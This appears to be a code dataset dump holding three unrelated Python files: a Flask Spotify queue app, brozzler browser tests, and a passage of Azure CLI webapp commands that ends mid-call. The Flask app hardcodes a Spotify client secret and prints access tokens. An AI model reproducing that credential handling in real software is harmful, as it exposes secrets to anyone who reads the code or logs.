source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
app.py
|
import requests
from flask import Flask, render_template, request, redirect, make_response
from song import Song
import json
import spotify
from Queue import Queue
import datetime
import random, string
from threading import Thread
from bosesoundhooks import play, getTime
import webbrowser
from time import sleep
access_token = ''
app = Flask(__name__)
songs = Queue()
searchResults = []
def generateUname():
return ''.join(random.choices(string.ascii_letters + string.digits, k=10))
@app.route('/') #Queue
def index():
if request.cookies.get('username') == None:
resp = make_response(render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone=None,errortwo=None))
resp.set_cookie('username', generateUname(), expires=datetime.datetime.now() + datetime.timedelta(days=30))
return resp
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone=None, errortwo=None)
@app.route('/search', methods=['GET', 'POST'])
def search():
global searchResults
if request.method == 'POST':
query = request.form['SongSearch']
if query == '':
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone=None, errortwo='e1')
url = 'https://api.spotify.com/v1/search'
header = {'Authorization':
'Bearer {}'.format(access_token)}
payload = {'q':query, 'type':'track', 'market':'US', 'limit':5}
try:
r = requests.get(url, params = payload, headers = header)
except Exception as e:
print(str(e))
return redirect('/',code=302)
searchResultshere = spotify.saveResults(r.json())
for obj in searchResultshere:
searchResults.append(obj)
return render_template('search.html', searchArray=searchResultshere)
@app.route('/add/<uri>')
def add(uri):
global searchResults
for song in searchResults:
if song.info['uri'] == uri:
name = request.cookies.get('username')
if songs.add(song, name) == None:
return redirect("/", code=302)
else:
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error=None, errorone='e1', errortwo=None)
@app.route('/downvote/<uri>')
def downvote(uri):
if songs.downvote(uri, request.cookies.get('username')) != 'e1':
return redirect("/", code=302)
else:
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error='e1', errorone=None, errortwo=None)
@app.route('/upvote/<uri>')
def upvote(uri):
if songs.upvote(uri, request.cookies.get('username')) != 'e1':
return redirect("/", code=302)
else:
return render_template('queue.html', songArray=songs.queue, size=songs.size, nowPlaying=songs.nowPlaying, error='e1', errorone=None, errortwo=None)
def nextSong():
songs.nowPlaying = songs.get()
redirect('/', code=302)
@app.route('/login')
def login():
global access_token
auth_code = request.args.get('code')
payload = {'grant_type':'authorization_code', 'code':auth_code, 'redirect_uri':'http://localhost:8000/login',
'client_id': 'def27a12301844df8891ddab406ef2a3', 'client_secret':'0fce580315d64fc589cfd858a3319614'
}
token = requests.post('https://accounts.spotify.com/api/token', data = payload)
data = token.json()
access_token = data['access_token']
print(access_token)
return redirect("http://localhost:8000")
@app.route('/qrcode')
def displayQR():
return render_template('qrcode.html')
def worker(x=0):
if x ==0:
sleep(10)
print('working')
while songs.nowPlaying == None:
print('Nothing playing')
sleep(1)
play(songs.nowPlaying)
sleep(3)
a = getTime()
if (a - 10) > 0:
sleep(a-10)
while getTime() > 5:
sleep(1)
if songs.size >= 1:
songs.nowPlaying = songs.get()
return worker(x+1)
else:
return
if __name__ == '__main__':
print('Starting thread')
t = Thread(target=worker)
t.start()
webbrowser.open('https://accounts.spotify.com/authorize/?client_id=def27a12301844df8891ddab406ef2a3&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A8000%2Flogin')
app.run(host = '0.0.0.0', port=8000, debug=False)
|
test_brozzling.py
|
#!/usr/bin/env python
'''
test_brozzling.py - XXX explain
Copyright (C) 2016-2018 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import pytest
import brozzler
import logging
import os
import http.server
import threading
import argparse
import urllib
import json
import threading
import socket
args = argparse.Namespace()
args.log_level = logging.INFO
brozzler.cli.configure_logging(args)
WARCPROX_META_420 = {
'stats': {
'test_limits_bucket': {
'total': {'urls': 0, 'wire_bytes': 0},
'new': {'urls': 0, 'wire_bytes': 0},
'revisit': {'urls': 0, 'wire_bytes': 0},
'bucket': 'test_limits_bucket'
}
},
'reached-limit': {'test_limits_bucket/total/urls': 0}
}
@pytest.fixture(scope='module')
def httpd(request):
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.extensions_map['.mpd'] = 'video/vnd.mpeg.dash.mpd'
http.server.SimpleHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_GET(self):
if self.path == '/420':
self.send_response(420, 'Reached limit')
self.send_header('Connection', 'close')
self.send_header('Warcprox-Meta', json.dumps(WARCPROX_META_420))
payload = b'request rejected by warcprox: reached limit test_limits_bucket/total/urls=0\n'
self.send_header('Content-Type', 'text/plain;charset=utf-8')
self.send_header('Content-Length', len(payload))
self.end_headers()
self.wfile.write(payload)
elif self.path == '/401':
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(self.headers.get('Authorization', b''))
self.wfile.write(b'not authenticated')
else:
super().do_GET()
def do_POST(self):
if self.path == '/login-action':
self.send_response(200)
payload = b'login successful\n'
self.send_header('Content-Type', 'text/plain;charset=utf-8')
self.send_header('Content-Length', len(payload))
self.end_headers()
self.wfile.write(payload)
else:
super().do_POST()
# SimpleHTTPRequestHandler always uses CWD so we have to chdir
os.chdir(os.path.join(os.path.dirname(__file__), 'htdocs'))
httpd = http.server.HTTPServer(('localhost', 0), RequestHandler)
httpd_thread = threading.Thread(name='httpd', target=httpd.serve_forever)
httpd_thread.start()
def fin():
httpd.shutdown()
httpd.server_close()
httpd_thread.join()
request.addfinalizer(fin)
return httpd
def test_httpd(httpd):
'''
Tests that our http server is working as expected, and that two fetches
of the same url return the same payload, proving it can be used to test
deduplication.
'''
payload1 = content2 = None
url = 'http://localhost:%s/site1/file1.txt' % httpd.server_port
with urllib.request.urlopen(url) as response:
assert response.status == 200
payload1 = response.read()
assert payload1
with urllib.request.urlopen(url) as response:
assert response.status == 200
payload2 = response.read()
assert payload2
assert payload1 == payload2
url = 'http://localhost:%s/420' % httpd.server_port
with pytest.raises(urllib.error.HTTPError) as excinfo:
urllib.request.urlopen(url)
assert excinfo.value.getcode() == 420
def test_aw_snap_hes_dead_jim():
chrome_exe = brozzler.suggest_default_chrome_exe()
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.BrowsingException):
browser.browse_page('chrome://crash')
# chromium's 401 handling changed???
@pytest.mark.xfail
def test_page_interstitial_exception(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/401' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.PageInterstitialShown):
browser.browse_page(url)
def test_on_response(httpd):
response_urls = []
def on_response(msg):
response_urls.append(msg['params']['response']['url'])
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/site3/page.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(url, on_response=on_response)
assert response_urls[0] == 'http://localhost:%s/site3/page.html' % httpd.server_port
assert response_urls[1] == 'http://localhost:%s/site3/brozzler.svg' % httpd.server_port
assert response_urls[2] == 'http://localhost:%s/favicon.ico' % httpd.server_port
def test_420(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/420' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.ReachedLimit) as excinfo:
browser.browse_page(url)
assert excinfo.value.warcprox_meta == WARCPROX_META_420
def test_js_dialogs(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/site4/alert.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
# before commit d2ed6b97a24 these would hang and eventually raise
# brozzler.browser.BrowsingTimeout, which would cause this test to fail
browser.browse_page(
'http://localhost:%s/site4/alert.html' % httpd.server_port)
browser.browse_page(
'http://localhost:%s/site4/confirm.html' % httpd.server_port)
browser.browse_page(
'http://localhost:%s/site4/prompt.html' % httpd.server_port)
# XXX print dialog unresolved
# browser.browse_page(
# 'http://localhost:%s/site4/print.html' % httpd.server_port)
def test_page_videos(httpd):
# test depends on behavior of youtube-dl and chromium, could fail and need
# to be adjusted on youtube-dl or chromium updates
chrome_exe = brozzler.suggest_default_chrome_exe()
worker = brozzler.BrozzlerWorker(None)
site = brozzler.Site(None, {})
page = brozzler.Page(None, {
'url':'http://localhost:%s/site6/' % httpd.server_port})
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
worker.brozzle_page(browser, site, page)
assert page.videos
assert len(page.videos) == 4
assert page.videos[0] == {
'blame': 'youtube-dl',
'response_code': 200,
'content-length': 383631,
'content-type': 'video/mp4',
'url': 'http://localhost:%s/site6/small.mp4' % httpd.server_port,
}
assert page.videos[1] == {
'blame': 'youtube-dl',
'content-length': 92728,
'content-type': 'video/webm',
'response_code': 200,
'url': 'http://localhost:%s/site6/small-video_280x160_100k.webm' % httpd.server_port
}
assert page.videos[2] == {
'blame': 'youtube-dl',
'content-length': 101114,
'content-type': 'video/webm',
'response_code': 200,
'url': 'http://localhost:%s/site6/small-audio.webm' % httpd.server_port
}
assert page.videos[3] == {
'blame': 'browser',
# 'response_code': 206,
# 'content-range': 'bytes 0-229454/229455',
'response_code': 200,
'content-length': 229455,
'content-type': 'video/webm',
'url': 'http://localhost:%s/site6/small.webm' % httpd.server_port,
}
def test_extract_outlinks(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
worker = brozzler.BrozzlerWorker(None)
site = brozzler.Site(None, {})
page = brozzler.Page(None, {
'url':'http://localhost:%s/site8/' % httpd.server_port})
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
outlinks = worker.brozzle_page(browser, site, page)
assert outlinks == {
'http://example.com/offsite',
'http://localhost:%s/site8/baz/zuh' % httpd.server_port,
'http://localhost:%s/site8/fdjisapofdjisap#1' % httpd.server_port,
'http://localhost:%s/site8/fdjisapofdjisap#2' % httpd.server_port
}
def test_proxy_down():
'''
Test that browsing raises `brozzler.ProxyError` when proxy is down.
See also `test_proxy_down` in test_units.py.
Tests two different kinds of connection error:
- nothing listening the port (nobody listens on on port 4 :))
- port bound but not accepting connections
'''
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
for not_listening_proxy in (
'127.0.0.1:4', '127.0.0.1:%s' % sock.getsockname()[1]):
site = brozzler.Site(None, {'seed':'http://example.com/'})
page = brozzler.Page(None, {'url': 'http://example.com/'})
worker = brozzler.BrozzlerWorker(
frontier=None, proxy=not_listening_proxy)
chrome_exe = brozzler.suggest_default_chrome_exe()
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.ProxyError):
worker.brozzle_page(browser, site, page)
def test_try_login(httpd):
"""Test try_login behavior.
"""
response_urls = []
def on_response(msg):
response_urls.append(msg['params']['response']['url'])
chrome_exe = brozzler.suggest_default_chrome_exe()
form_url = 'http://localhost:%s/site11/form1.html' % httpd.server_port
form_url_other = 'http://localhost:%s/site11/form2.html' % httpd.server_port
favicon_url = 'http://localhost:%s/favicon.ico' % httpd.server_port
login_url = 'http://localhost:%s/login-action' % httpd.server_port
# When username and password are defined and initial page has login form,
# detect login form, submit login, and then return to the initial page.
username = 'user1'
password = 'pass1'
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_url, username=username, password=password,
on_response=on_response)
assert len(response_urls) == 4
assert response_urls[0] == form_url
assert response_urls[1] == favicon_url
assert response_urls[2] == login_url
assert response_urls[3] == form_url
# We are now supporting a different type of form, we'll test that here.
response_urls = []
username = 'user1'
password = 'pass1'
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_url_other, username=username, password=password,
on_response=on_response)
assert len(response_urls) == 4
assert response_urls[0] == form_url_other
assert response_urls[1] == favicon_url
assert response_urls[2] == login_url
assert response_urls[3] == form_url_other
# When username and password are not defined, just load the initial page.
response_urls = []
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_url, on_response=on_response)
assert len(response_urls) == 2
assert response_urls[0] == form_url
assert response_urls[1] == favicon_url
# when the page doesn't have a form with username/password, don't submit it
response_urls = []
form_without_login_url = 'http://localhost:%s/site11/form-no-login.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(form_without_login_url, username=username,
password=password, on_response=on_response)
assert len(response_urls) == 2
assert response_urls[0] == form_without_login_url
assert response_urls[1] == favicon_url
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError, MutuallyExclusiveArgumentError)
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
